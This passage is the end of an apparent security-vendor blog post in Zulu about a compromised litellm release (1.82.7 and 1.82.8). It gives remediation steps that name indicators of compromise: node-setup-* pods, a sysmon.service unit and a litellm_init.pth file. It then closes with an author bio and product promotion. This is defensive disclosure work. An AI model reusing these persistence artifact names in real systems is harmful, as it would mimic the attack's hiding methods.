Izinhlangano ezifake i-litellm 1.82.7 noma i-1.82.8 ngesikhathi samahora angu-5.5 kufanele ziphathe lokhu njengesivumelwano esiphelele sokuqinisekisa: zijikeleze zonke izimfihlo ezinhlelweni ezithintekile, zihlole amaqoqo e-Kubernetes ukuze node-setup-* ama-pod ku kube-system, susa noma yikuphi sysmon.service amayunithi e-systemd, bese uhlola litellm_init.pth ku-Python site-packages/ izincwajana. Abasebenzisi besithombe esisemthethweni se-Docker (ghcr.io/berriai/litellm) azizange zithinteke, njengoba isithombe sinamathisele ukuxhomeka kwaso futhi asizange sakhiwe kabusha ngesikhathi sewindi lokudalulwa.

Mayelana Nombhali

Umsunguli kanye ne-CTO

Louis Rodriguez unguMsunguli kanye ne-CTO kwa-Xygeni Security. Njengoba eneminyaka engaphezu kwengu-20 ekuphepheni kohlelo lokusebenza, ugxila ekuvikelweni kwe-AppSec kanye namakhono okuhlaziya ikhodi athuthukile asiza amaqembu ukunciphisa ingozi yangempela yokulethwa.

 
amathuluzi-we-sca-amathuluzi-okuhlaziya ukwakheka kwesofthiwe
Beka phambili, ulungise, futhi uvikele izingozi zesofthiwe yakho
Thola i-Akhawunti Yakho Yamahhala.
Awekho ikhadi lesikweletu elidingekayo.

Vikela Ukuthuthukiswa Kwesofthiwe Yakho Nokulethwa Kwayo

ne-Xygeni Product Suite